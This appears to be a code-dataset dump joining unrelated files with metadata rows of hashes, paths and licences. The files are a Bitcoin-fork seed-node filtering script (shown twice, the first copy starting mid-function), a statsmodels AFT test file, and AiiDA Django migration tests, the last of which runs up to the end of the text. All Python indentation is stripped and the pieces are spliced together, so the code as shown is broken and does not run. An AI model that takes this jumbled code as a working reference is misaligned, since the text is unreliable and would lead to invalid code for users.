m = PATTERN_ONION.match(sline[0])
if m is None:
return None
else:
net = 'onion'
ipstr = sortkey = m.group(1)
port = int(m.group(2))
else:
net = 'ipv6'
if m.group(1) in ['::']: # Not interested in localhost
return None
ipstr = m.group(1)
sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
port = int(m.group(2))
else:
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
net = 'ipv4'
sortkey = ip
ipstr = m.group(1)
port = int(m.group(6))
# Skip bad results.
if sline[1] == 0:
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
if len(sline) > 11:
agent = sline[11][1:] + sline[12][:-1]
else:
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'net': net,
'ip': ipstr,
'port': port,
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
'sortkey': sortkey,
}
def filtermultiport(ips):
'''Filter out hosts with more nodes per IP'''
hist = collections.defaultdict(list)
for ip in ips:
hist[ip['sortkey']].append(ip)
return [value[0] for (key,value) in list(hist.items()) if len(value)==1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
# Sift out ips by type
ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
ips_onion = [ip for ip in ips if ip['net'] == 'onion']
# Filter IPv4 by ASN
result = []
asn_count = {}
for ip in ips_ipv4:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
# TODO: filter IPv6 by ASN
# Add back non-IPv4
result.extend(ips_ipv6)
result.extend(ips_onion)
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
# Skip entries with valid address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
# Filter out hosts with multiple bitcoin ports, these are likely abusive
ips = filtermultiport(ips)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['net'], x['sortkey']))
for ip in ips:
if ip['net'] == 'ipv6':
print('[%s]:%i' % (ip['ip'], ip['port']))
else:
print('%s:%i' % (ip['ip'], ip['port']))
if __name__ == '__main__':
main()
| 32.05814
| 186
| 0.566921
|
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/MTNCCore:2.2.(0|1|99)/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
m = PATTERN_IPV4.match(sline[0])
sortkey = None
ip = None
if m is None:
m = PATTERN_IPV6.match(sline[0])
if m is None:
m = PATTERN_ONION.match(sline[0])
if m is None:
return None
else:
net = 'onion'
ipstr = sortkey = m.group(1)
port = int(m.group(2))
else:
net = 'ipv6'
if m.group(1) in ['::']: # Not interested in localhost
return None
ipstr = m.group(1)
sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
port = int(m.group(2))
else:
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
net = 'ipv4'
sortkey = ip
ipstr = m.group(1)
port = int(m.group(6))
# Skip bad results.
if sline[1] == 0:
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
if len(sline) > 11:
agent = sline[11][1:] + sline[12][:-1]
else:
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'net': net,
'ip': ipstr,
'port': port,
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
'sortkey': sortkey,
}
def filtermultiport(ips):
hist = collections.defaultdict(list)
for ip in ips:
hist[ip['sortkey']].append(ip)
return [value[0] for (key,value) in list(hist.items()) if len(value)==1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
ips_onion = [ip for ip in ips if ip['net'] == 'onion']
result = []
asn_count = {}
for ip in ips_ipv4:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
# TODO: filter IPv6 by ASN
# Add back non-IPv4
result.extend(ips_ipv6)
result.extend(ips_onion)
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
# Skip entries with valid address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
# Filter out hosts with multiple bitcoin ports, these are likely abusive
ips = filtermultiport(ips)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['net'], x['sortkey']))
for ip in ips:
if ip['net'] == 'ipv6':
print('[%s]:%i' % (ip['ip'], ip['port']))
else:
print('%s:%i' % (ip['ip'], ip['port']))
if __name__ == '__main__':
main()
| true
| true
|
1c447808e077aaa4205e3b4d55649bde5820daca
| 1,533
|
py
|
Python
|
venv/Lib/site-packages/statsmodels/emplike/tests/test_aft.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 76
|
2019-12-28T08:37:10.000Z
|
2022-03-29T02:19:41.000Z
|
venv/Lib/site-packages/statsmodels/emplike/tests/test_aft.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 7
|
2020-12-04T04:10:42.000Z
|
2021-03-16T00:53:09.000Z
|
venv/Lib/site-packages/statsmodels/emplike/tests/test_aft.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 35
|
2020-02-04T14:46:25.000Z
|
2022-03-24T03:56:17.000Z
|
import numpy as np
from numpy.testing import assert_almost_equal
import pytest
from statsmodels.datasets import heart
from statsmodels.tools import add_constant
from statsmodels.emplike.aft_el import emplikeAFT
from .results.el_results import AFTRes
class GenRes(object):
@classmethod
def setup_class(cls):
data = heart.load(as_pandas=False)
endog = np.log10(data.endog)
exog = add_constant(data.exog)
cls.mod1 = emplikeAFT(endog, exog, data.censors)
cls.res1 = cls.mod1.fit()
cls.res2 = AFTRes()
class Test_AFTModel(GenRes):
def test_params(self):
assert_almost_equal(self.res1.params(), self.res2.test_params,
decimal=4)
def test_beta0(self):
assert_almost_equal(self.res1.test_beta([4], [0]),
self.res2.test_beta0, decimal=4)
def test_beta1(self):
assert_almost_equal(self.res1.test_beta([-.04], [1]),
self.res2.test_beta1, decimal=4)
def test_beta_vect(self):
assert_almost_equal(self.res1.test_beta([3.5, -.035], [0, 1]),
self.res2.test_joint, decimal=4)
@pytest.mark.slow
def test_betaci(self):
ci = self.res1.ci_beta(1, -.06, 0)
ll = ci[0]
ul = ci[1]
ll_pval = self.res1.test_beta([ll], [1])[1]
ul_pval = self.res1.test_beta([ul], [1])[1]
assert_almost_equal(ul_pval, .050000, decimal=4)
assert_almost_equal(ll_pval, .05000, decimal=4)
| 31.285714
| 70
| 0.622309
|
import numpy as np
from numpy.testing import assert_almost_equal
import pytest
from statsmodels.datasets import heart
from statsmodels.tools import add_constant
from statsmodels.emplike.aft_el import emplikeAFT
from .results.el_results import AFTRes
class GenRes(object):
@classmethod
def setup_class(cls):
data = heart.load(as_pandas=False)
endog = np.log10(data.endog)
exog = add_constant(data.exog)
cls.mod1 = emplikeAFT(endog, exog, data.censors)
cls.res1 = cls.mod1.fit()
cls.res2 = AFTRes()
class Test_AFTModel(GenRes):
def test_params(self):
assert_almost_equal(self.res1.params(), self.res2.test_params,
decimal=4)
def test_beta0(self):
assert_almost_equal(self.res1.test_beta([4], [0]),
self.res2.test_beta0, decimal=4)
def test_beta1(self):
assert_almost_equal(self.res1.test_beta([-.04], [1]),
self.res2.test_beta1, decimal=4)
def test_beta_vect(self):
assert_almost_equal(self.res1.test_beta([3.5, -.035], [0, 1]),
self.res2.test_joint, decimal=4)
@pytest.mark.slow
def test_betaci(self):
ci = self.res1.ci_beta(1, -.06, 0)
ll = ci[0]
ul = ci[1]
ll_pval = self.res1.test_beta([ll], [1])[1]
ul_pval = self.res1.test_beta([ul], [1])[1]
assert_almost_equal(ul_pval, .050000, decimal=4)
assert_almost_equal(ll_pval, .05000, decimal=4)
| true
| true
|
1c44780d3720b0a7ebaf9faf8a7f24a94a06d947
| 37,598
|
py
|
Python
|
tests/backends/aiida_django/migrations/test_migrations_many.py
|
louisponet/aiida-core
|
3214236df66a3792ee57fe38a06c0c3bb65861ab
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
tests/backends/aiida_django/migrations/test_migrations_many.py
|
louisponet/aiida-core
|
3214236df66a3792ee57fe38a06c0c3bb65861ab
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2021-07-14T07:59:44.000Z
|
2021-08-01T10:31:09.000Z
|
tests/backends/aiida_django/migrations/test_migrations_many.py
|
louisponet/aiida-core
|
3214236df66a3792ee57fe38a06c0c3bb65861ab
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name, import-error, no-name-in-module
"""
This file contains the majority of the migration tests that are too short to
go to a separate file.
"""
import numpy
from aiida.backends.testbase import AiidaTestCase
from aiida.backends.djsite.db.migrations import ModelModifierV0025
from aiida.backends.general.migrations import utils
from aiida.common.exceptions import IntegrityError
from .test_migrations_common import TestMigrations
class TestMigrationsModelModifierV0025(TestMigrations):
"""Sub class of `TestMigrations` that need to work on node attributes using the `ModelModifierV0025`."""
def set_attribute(self, node, key, value):
DbAttribute = self.apps.get_model('db', 'DbAttribute')
modifier = ModelModifierV0025(self.apps, DbAttribute)
modifier.set_value_for_node(node.pk, key, value)
def get_attribute(self, node, key, default=None): # pylint: disable=missing-docstring
DbAttribute = self.apps.get_model('db', 'DbAttribute')
modifier = ModelModifierV0025(self.apps, DbAttribute)
try:
return modifier.get_value_for_node(node.pk, key)
except AttributeError:
return default
@staticmethod
def get_node_array(node, name):
return utils.load_numpy_array_from_repository(node.uuid, name)
def set_node_array(self, node, name, array):
"""Store a new numpy array inside a node. Possibly overwrite the array if it already existed.
Internally, it stores a name.npy file in numpy format.
:param name: The name of the array.
:param array: The numpy array to store.
"""
utils.store_numpy_array_in_repository(node.uuid, name, array)
self.set_attribute(node, f'array|{name}', list(array.shape))
class TestNoMigrations(AiidaTestCase):
"""Verify that no django migrations remain."""
def test_no_remaining_migrations(self): # pylint: disable=no-self-use
"""
Verify that no django migrations remain.
Equivalent to python manage.py makemigrations --check
"""
from django.core.management import call_command
# Raises SystemExit, if migrations remain
call_command('makemigrations', '--check', verbosity=0)
class TestDuplicateNodeUuidMigration(TestMigrations):
"""Test the migration that verifies that there are no duplicate UUIDs"""
migrate_from = '0013_django_1_8'
migrate_to = '0014_add_node_uuid_unique_constraint'
def setUpBeforeMigration(self):
from aiida.common.utils import get_new_uuid
from aiida.backends.general.migrations.utils import deduplicate_uuids, verify_uuid_uniqueness
self.file_name = 'test.temp'
self.file_content = '#!/bin/bash\n\necho test run\n'
self.nodes_boolean = []
self.nodes_integer = []
self.n_bool_duplicates = 2
self.n_int_duplicates = 4
node_bool = self.DbNode(type='data.bool.Bool.', user_id=self.default_user.id, uuid=get_new_uuid())
node_bool.save()
node_int = self.DbNode(type='data.int.Int.', user_id=self.default_user.id, uuid=get_new_uuid())
node_int.save()
self.nodes_boolean.append(node_bool)
self.nodes_integer.append(node_int)
for _ in range(self.n_bool_duplicates):
node = self.DbNode(type='data.bool.Bool.', user_id=self.default_user.id, uuid=node_bool.uuid)
node.save()
utils.put_object_from_string(node.uuid, self.file_name, self.file_content)
self.nodes_boolean.append(node)
for _ in range(self.n_int_duplicates):
node = self.DbNode(type='data.int.Int.', user_id=self.default_user.id, uuid=node_int.uuid)
node.save()
utils.put_object_from_string(node.uuid, self.file_name, self.file_content)
self.nodes_integer.append(node)
# Verify that there are duplicate UUIDs by checking that the following function raises
with self.assertRaises(IntegrityError):
verify_uuid_uniqueness(table='db_dbnode')
# Now run the function responsible for solving duplicate UUIDs which would also be called by the user
# through the `verdi database integrity detect-duplicate-uuid` command
deduplicate_uuids(table='db_dbnode')
def test_deduplicated_uuids(self):
"""Verify that after the migration, all expected nodes are still there with unique UUIDs."""
# If the duplicate UUIDs were successfully fixed, the following should not raise.
from aiida.backends.general.migrations.utils import verify_uuid_uniqueness
verify_uuid_uniqueness(table='db_dbnode')
# Reload the nodes by PK and check that all UUIDs are now unique
nodes_boolean = [self.load_node(node.pk) for node in self.nodes_boolean]
uuids_boolean = [node.uuid for node in nodes_boolean]
self.assertEqual(len(set(uuids_boolean)), len(nodes_boolean))
nodes_integer = [self.load_node(node.pk) for node in self.nodes_integer]
uuids_integer = [node.uuid for node in nodes_integer]
self.assertEqual(len(set(uuids_integer)), len(nodes_integer))
for node in nodes_boolean:
self.assertEqual(utils.get_object_from_repository(node.uuid, self.file_name), self.file_content)
class TestUuidMigration(TestMigrations):
"""
This test class checks the migration 0018_django_1_11 which switches from the django_extensions
UUID field to the native UUIDField of django 1.11. It also introduces unique constraints
on all uuid columns (previously existed only on dbnode).
"""
migrate_from = '0017_drop_dbcalcstate'
migrate_to = '0018_django_1_11'
def setUpBeforeMigration(self):
node = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
node.save()
self.node_uuid = str(node.uuid)
self.node_id = node.id
def test_uuid_untouched(self):
"""Verify that Node uuids remain unchanged."""
node = self.load_node(self.node_id)
self.assertEqual(self.node_uuid, str(node.uuid))
class TestGroupRenamingMigration(TestMigrations):
"""
This test class checks the migration 0022_dbgroup_type_string_change_content which updates the
type_string column of the groups.
"""
migrate_from = '0021_dbgroup_name_to_label_type_to_type_string'
migrate_to = '0022_dbgroup_type_string_change_content'
def setUpBeforeMigration(self):
# Create group
DbGroup = self.apps.get_model('db', 'DbGroup')
# test user group type_string: '' -> 'user'
group_user = DbGroup(label='test_user_group', user_id=self.default_user.id, type_string='')
group_user.save()
self.group_user_pk = group_user.pk
# test data.upf group type_string: 'data.upf.family' -> 'data.upf'
group_data_upf = DbGroup(
label='test_data_upf_group', user_id=self.default_user.id, type_string='data.upf.family'
)
group_data_upf.save()
self.group_data_upf_pk = group_data_upf.pk
# test auto.import group type_string: 'aiida.import' -> 'auto.import'
group_autoimport = DbGroup(label='test_import_group', user_id=self.default_user.id, type_string='aiida.import')
group_autoimport.save()
self.group_autoimport_pk = group_autoimport.pk
# test auto.run group type_string: 'autogroup.run' -> 'auto.run'
group_autorun = DbGroup(label='test_autorun_group', user_id=self.default_user.id, type_string='autogroup.run')
group_autorun.save()
self.group_autorun_pk = group_autorun.pk
def test_group_string_update(self):
""" Test that the type_string were updated correctly """
DbGroup = self.apps.get_model('db', 'DbGroup')
# test user group type_string: '' -> 'user'
group_user = DbGroup.objects.get(pk=self.group_user_pk)
self.assertEqual(group_user.type_string, 'user')
# test data.upf group type_string: 'data.upf.family' -> 'data.upf'
group_data_upf = DbGroup.objects.get(pk=self.group_data_upf_pk)
self.assertEqual(group_data_upf.type_string, 'data.upf')
# test auto.import group type_string: 'aiida.import' -> 'auto.import'
group_autoimport = DbGroup.objects.get(pk=self.group_autoimport_pk)
self.assertEqual(group_autoimport.type_string, 'auto.import')
# test auto.run group type_string: 'autogroup.run' -> 'auto.run'
group_autorun = DbGroup.objects.get(pk=self.group_autorun_pk)
self.assertEqual(group_autorun.type_string, 'auto.run')
class TestCalcAttributeKeysMigration(TestMigrationsModelModifierV0025):
"""
This test class checks that the migration 0023_calc_job_option_attribute_keys works as expected
which migrates CalcJobNode attributes for metadata options whose key changed.
"""
migrate_from = '0022_dbgroup_type_string_change_content'
migrate_to = '0023_calc_job_option_attribute_keys'
KEY_RESOURCES_OLD = 'jobresource_params'
KEY_RESOURCES_NEW = 'resources'
KEY_PARSER_NAME_OLD = 'parser'
KEY_PARSER_NAME_NEW = 'parser_name'
KEY_PROCESS_LABEL_OLD = '_process_label'
KEY_PROCESS_LABEL_NEW = 'process_label'
KEY_ENVIRONMENT_VARIABLES_OLD = 'custom_environment_variables'
KEY_ENVIRONMENT_VARIABLES_NEW = 'environment_variables'
def setUpBeforeMigration(self):
self.process_label = 'TestLabel'
self.resources = {'number_machines': 1}
self.environment_variables = {}
self.parser_name = 'aiida.parsers:parser'
self.node_work = self.DbNode(type='node.process.workflow.WorkflowNode.', user_id=self.default_user.id)
self.node_work.save()
self.set_attribute(self.node_work, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_calc.save()
self.set_attribute(self.node_calc, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.set_attribute(self.node_calc, self.KEY_RESOURCES_OLD, self.resources)
self.set_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_OLD, self.environment_variables)
self.set_attribute(self.node_calc, self.KEY_PARSER_NAME_OLD, self.parser_name)
# Create a node of a different type to ensure that its attributes are not updated
self.node_other = self.DbNode(type='node.othernode.', user_id=self.default_user.id)
self.node_other.save()
self.set_attribute(self.node_other, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.set_attribute(self.node_other, self.KEY_RESOURCES_OLD, self.resources)
self.set_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_OLD, self.environment_variables)
self.set_attribute(self.node_other, self.KEY_PARSER_NAME_OLD, self.parser_name)
def test_attribute_key_changes(self):
"""Verify that the keys are successfully changed of the affected attributes."""
NOT_FOUND = tuple([0])
self.assertEqual(self.get_attribute(self.node_work, self.KEY_PROCESS_LABEL_NEW), self.process_label)
self.assertEqual(self.get_attribute(self.node_work, self.KEY_PROCESS_LABEL_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PROCESS_LABEL_NEW), self.process_label)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_RESOURCES_NEW), self.resources)
self.assertEqual(
self.get_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_NEW), self.environment_variables
)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PARSER_NAME_NEW), self.parser_name)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PROCESS_LABEL_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_RESOURCES_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(
self.get_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_OLD, default=NOT_FOUND), NOT_FOUND
)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PARSER_NAME_OLD, default=NOT_FOUND), NOT_FOUND)
# The following node should not be migrated even if its attributes have the matching keys because
# the node is not a ProcessNode
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PROCESS_LABEL_OLD), self.process_label)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_RESOURCES_OLD), self.resources)
self.assertEqual(
self.get_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_OLD), self.environment_variables
)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PARSER_NAME_OLD), self.parser_name)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PROCESS_LABEL_NEW, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_RESOURCES_NEW, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(
self.get_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_NEW, default=NOT_FOUND), NOT_FOUND
)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PARSER_NAME_NEW, default=NOT_FOUND), NOT_FOUND)
class TestDbLogMigrationRecordCleaning(TestMigrations):
"""
This test class checks that the migration 0024_dblog_update works as expected.
That migration updates of the DbLog table and adds uuids
"""
migrate_from = '0023_calc_job_option_attribute_keys'
migrate_to = '0024_dblog_update'
def setUpBeforeMigration(self): # pylint: disable=too-many-locals
import json
import importlib
from aiida.backends.general.migrations.utils import dumps_json
update_024 = importlib.import_module('aiida.backends.djsite.db.migrations.0024_dblog_update')
DbNode = self.apps.get_model('db', 'DbNode')
DbWorkflow = self.apps.get_model('db', 'DbWorkflow')
DbLog = self.apps.get_model('db', 'DbLog')
# Creating the needed nodes & workflows
calc_1 = DbNode(type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
param = DbNode(type='data.dict.Dict.', user_id=self.default_user.id)
leg_workf = DbWorkflow(label='Legacy WorkflowNode', user_id=self.default_user.id)
calc_2 = DbNode(type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
# Storing them
calc_1.save()
param.save()
leg_workf.save()
calc_2.save()
# Creating the corresponding log records and storing them
log_1 = DbLog(
loggername='CalculationNode logger',
objpk=calc_1.pk,
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 1',
metadata=json.dumps({
'msecs': 719.0849781036377,
'objpk': calc_1.pk,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_2 = DbLog(
loggername='something.else logger',
objpk=param.pk,
objname='something.else.',
message='parameter data with log message'
)
log_3 = DbLog(
loggername='TopologicalWorkflow logger',
objpk=leg_workf.pk,
objname='aiida.workflows.user.topologicalworkflows.topo.TopologicalWorkflow',
message='parameter data with log message'
)
log_4 = DbLog(
loggername='CalculationNode logger',
objpk=calc_2.pk,
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 2',
metadata=json.dumps({
'msecs': 719.0849781036377,
'objpk': calc_2.pk,
'lineno': 360,
'levelno': 23,
'message': 'calculation node 1',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
# Creating two more log records that don't correspond to a node
log_5 = DbLog(
loggername='CalculationNode logger',
objpk=(calc_2.pk + 1000),
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 1000',
metadata=json.dumps({
'msecs': 718,
'objpk': (calc_2.pk + 1000),
'lineno': 361,
'levelno': 25,
'message': 'calculation node 1000',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_6 = DbLog(
loggername='CalculationNode logger',
objpk=(calc_2.pk + 1001),
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 10001',
metadata=json.dumps({
'msecs': 722,
'objpk': (calc_2.pk + 1001),
'lineno': 362,
'levelno': 24,
'message': 'calculation node 1001',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
# Storing the log records
log_1.save()
log_2.save()
log_3.save()
log_4.save()
log_5.save()
log_6.save()
# Storing temporarily information needed for the check at the test
self.to_check = dict()
# Keeping calculation & calculation log ids
self.to_check['CalculationNode'] = (
calc_1.pk,
log_1.pk,
calc_2.pk,
log_4.pk,
)
# Getting the serialized Dict logs
param_data = DbLog.objects.filter(objpk=param.pk).filter(objname='something.else.'
).values(*update_024.values_to_export)[:1]
serialized_param_data = dumps_json(list(param_data))
# Getting the serialized logs for the unknown entity logs (as the export migration fuction
# provides them) - this should coincide to the above
serialized_unknown_exp_logs = update_024.get_serialized_unknown_entity_logs(self.schema_editor)
# Getting their number
unknown_exp_logs_number = update_024.get_unknown_entity_log_number(self.schema_editor)
self.to_check['Dict'] = (serialized_param_data, serialized_unknown_exp_logs, unknown_exp_logs_number)
# Getting the serialized legacy workflow logs
leg_wf = DbLog.objects.filter(objpk=leg_workf.pk).filter(
objname='aiida.workflows.user.topologicalworkflows.topo.TopologicalWorkflow'
).values(*update_024.values_to_export)[:1]
serialized_leg_wf_logs = dumps_json(list(leg_wf))
# Getting the serialized logs for the legacy workflow logs (as the export migration function
# provides them) - this should coincide to the above
serialized_leg_wf_exp_logs = update_024.get_serialized_legacy_workflow_logs(self.schema_editor)
eg_wf_exp_logs_number = update_024.get_legacy_workflow_log_number(self.schema_editor)
self.to_check['WorkflowNode'] = (serialized_leg_wf_logs, serialized_leg_wf_exp_logs, eg_wf_exp_logs_number)
# Getting the serialized logs that don't correspond to a DbNode record
logs_no_node = DbLog.objects.filter(id__in=[log_5.id, log_6.id]).values(*update_024.values_to_export)
serialized_logs_no_node = dumps_json(list(logs_no_node))
# Getting the serialized logs that don't correspond to a node (as the export migration function
# provides them) - this should coincide to the above
serialized_logs_exp_no_node = update_024.get_serialized_logs_with_no_nodes(self.schema_editor)
logs_no_node_number = update_024.get_logs_with_no_nodes_number(self.schema_editor)
self.to_check['NoNode'] = (serialized_logs_no_node, serialized_logs_exp_no_node, logs_no_node_number)
def tearDown(self):
"""Cleaning the DbLog, DbUser, DbWorkflow and DbNode records"""
DbUser = self.apps.get_model('db', 'DbUser')
DbNode = self.apps.get_model('db', 'DbNode')
DbWorkflow = self.apps.get_model('db', 'DbWorkflow')
DbLog = self.apps.get_model('db', 'DbLog')
DbLog.objects.all().delete()
DbNode.objects.all().delete() # pylint: disable=no-member
DbWorkflow.objects.all().delete() # pylint: disable=no-member
DbUser.objects.all().delete() # pylint: disable=no-member
super().tearDown()
def test_dblog_calculation_node(self):
"""
Verify that after the migration there is only two log records left and verify that they corresponds to
the CalculationNodes.
"""
DbLog = self.apps.get_model('db', 'DbLog')
# Check that only two log records exist
self.assertEqual(DbLog.objects.count(), 2, 'There should be two log records left')
# Get the node id of the log record referencing the node and verify that it is the correct one
dbnode_id_1 = DbLog.objects.filter(pk=self.to_check['CalculationNode'][1]
).values('dbnode_id')[:1].get()['dbnode_id']
self.assertEqual(dbnode_id_1, self.to_check['CalculationNode'][0], 'referenced node is not the expected one')
dbnode_id_2 = DbLog.objects.filter(pk=self.to_check['CalculationNode'][3]
).values('dbnode_id')[:1].get()['dbnode_id']
self.assertEqual(dbnode_id_2, self.to_check['CalculationNode'][2], 'referenced node is not the expected one')
def test_dblog_correct_export_of_logs(self):
"""
Verify that export log methods for legacy workflows, unknown entities and log records that
don't correspond to nodes, work as expected
"""
import json
self.assertEqual(self.to_check['Dict'][0], self.to_check['Dict'][1])
self.assertEqual(self.to_check['Dict'][2], 1)
self.assertEqual(self.to_check['WorkflowNode'][0], self.to_check['WorkflowNode'][1])
self.assertEqual(self.to_check['WorkflowNode'][2], 1)
self.assertEqual(
sorted(list(json.loads(self.to_check['NoNode'][0])), key=lambda k: k['id']),
sorted(list(json.loads(self.to_check['NoNode'][1])), key=lambda k: k['id'])
)
